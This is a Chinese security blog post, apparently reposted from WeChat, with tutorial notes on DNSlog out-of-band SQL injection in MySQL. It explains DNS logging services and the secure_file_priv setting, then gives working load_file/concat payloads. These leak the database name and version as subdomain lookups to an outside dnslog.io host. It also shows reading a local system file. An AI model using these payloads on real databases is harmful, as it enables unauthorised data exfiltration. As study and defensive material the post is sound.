DNSlog注入笔记

admin 2022年6月14日17:08:51安全文章评论14 views738字阅读2分27秒阅读模式

原理

首先需要有一个可以配置的域名,比如:gwsg7.l.dnslog.io,然后通过代理商设置域名 gwsg7.l.dnslog.io 的 nameserver 为自己的服务器 A,然后再服务器 A 上配置好 DNS Server,这样以来所有 gwsg7.l.dnslog.io 及其子域名的查询都会到 服务器 A 上,这时就能够实时地监控域名查询请求了

https://dnslog.io/ 这是一个免费的记录dnslog的平台,访问后会给你一个临时的三级域名:xxx.l.dnslog.io 当我们把注入信息放到四级域名那里,日志会记录下来。

load_file

通过DNSlog盲注需要用到load_file()函数。show variables like '%secure%' 查看load_file()可以读取的磁盘。

DNSlog注入笔记

1、当secure_file_priv为空,就可以读取磁盘的目录。
2、当secure_file_priv为G:,就可以读取G盘的文件。
3、当secure_file_priv为null,load_file就不能加载文件。

在5.7.6之后默认为null,可以自己去my.ini里[mysqld]的添加

DNSlog注入笔记

尝试读取文件

select load_file('C:\Windows\win.ini');

DNSlog注入笔记

Sql注入

use mysql;select load_file(concat('\\\\',(select database()),'.yoz1k.l.dnslog.io\abc'));

DNSlog注入笔记

成功获取

DNSlog注入笔记

获取数据库版本

select load_file(concat('\\\\',(select version()),'.yoz1k.l.dnslog.io\abc'));


原文始发于微信公众号(Mo60):DNSlog注入笔记

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月14日17:08:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  DNSlog注入笔记 http://cn-sec.com/archives/1069896.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: